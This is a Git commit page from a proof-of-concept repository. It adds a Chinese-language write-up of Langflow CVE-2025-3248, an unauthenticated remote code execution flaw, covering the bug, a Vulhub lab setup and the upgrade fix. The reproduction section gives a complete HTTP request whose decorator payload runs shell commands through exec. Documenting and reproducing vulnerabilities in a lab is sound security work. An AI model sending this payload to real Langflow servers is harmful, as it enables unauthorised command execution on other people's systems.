admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-05-28 01:01:19 +00:00
Code Issues Packages Projects Releases Wiki Activity

update CVE-2025-3248

Browse Source
This commit is contained in:
Threekiii 2025-04-21 17:36:21 +08:00
parent 98dd292f01
commit b9c599b368
3 changed files with 54 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

54
人工智能漏洞/Langflow code API 未授权远程代码执行漏洞 CVE-2025-3248.md Normal file
View File

@ -0,0 +1,54 @@
# Langflow code API 未授权远程代码执行漏洞 CVE-2025-3248
## 漏洞描述
Langflow 是一个流行的开源 AI 工作流可视化工具,允许用户通过 Web 界面拖拽式构建基于 Python 的智能体和数据处理流程。
在 1.3.0 版本之前Langflow 存在一个严重的未授权远程代码执行漏洞CVE-2025-3248。/api/v1/validate/code 接口原本用来校验用户提交的 Python 代码是否合法,其内部通过 ast 解析代码后,使用 exec 执行所有函数定义。然而Python 的装饰器和默认参数表达式也会在函数定义时被执行,攻击者可以通过精心构造的装饰器或默认参数,在未授权的情况下实现任意代码执行。
参考链接:
- https://horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/
- https://github.com/langflow-ai/langflow/releases/tag/1.3.0
- [langflow-ai/langflow#6911](https://github.com/langflow-ai/langflow/pull/6911)
## 漏洞影响
```
Langflow < 1.3.0
```
## 环境搭建
Vulhub 执行如下命令启动 Langflow 1.2.0 漏洞环境:
```
docker compose up -d
```
服务启动后Web 界面可通过 `http://your-ip:7860` 访问。你可以通过默认账号 `administrator:vulhub` 登录管理后台。
![](images/Langflow%20code%20API%20未授权远程代码执行漏洞%20CVE-2025-3248/image-20250421172157739.png)
## 漏洞复现
直接向 `/api/v1/validate/code` 接口发送包含恶意装饰器的 Python 函数定义,即可来实现远程命令执行:
```
POST /api/v1/validate/code HTTP/1.1
Host: your-ip:7860
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Content-Type: application/json
Content-Length: 125
{"code": "@exec(\"raise Exception(__import__('subprocess').check_output(['id']))\")\ndef foo():\n pass","a7fb98s8pvr":"="}
```
![](images/Langflow%20code%20API%20未授权远程代码执行漏洞%20CVE-2025-3248/image-20250421172343669.png)
## 漏洞修复
升级至 Langflow 1.3.0 版本: https://github.com/langflow-ai/langflow/releases/tag/1.3.0

BIN
人工智能漏洞/images/Langflow code API 未授权远程代码执行漏洞 CVE-2025-3248/image-20250421172157739.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 157 KiB

BIN
人工智能漏洞/images/Langflow code API 未授权远程代码执行漏洞 CVE-2025-3248/image-20250421172343669.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 271 KiB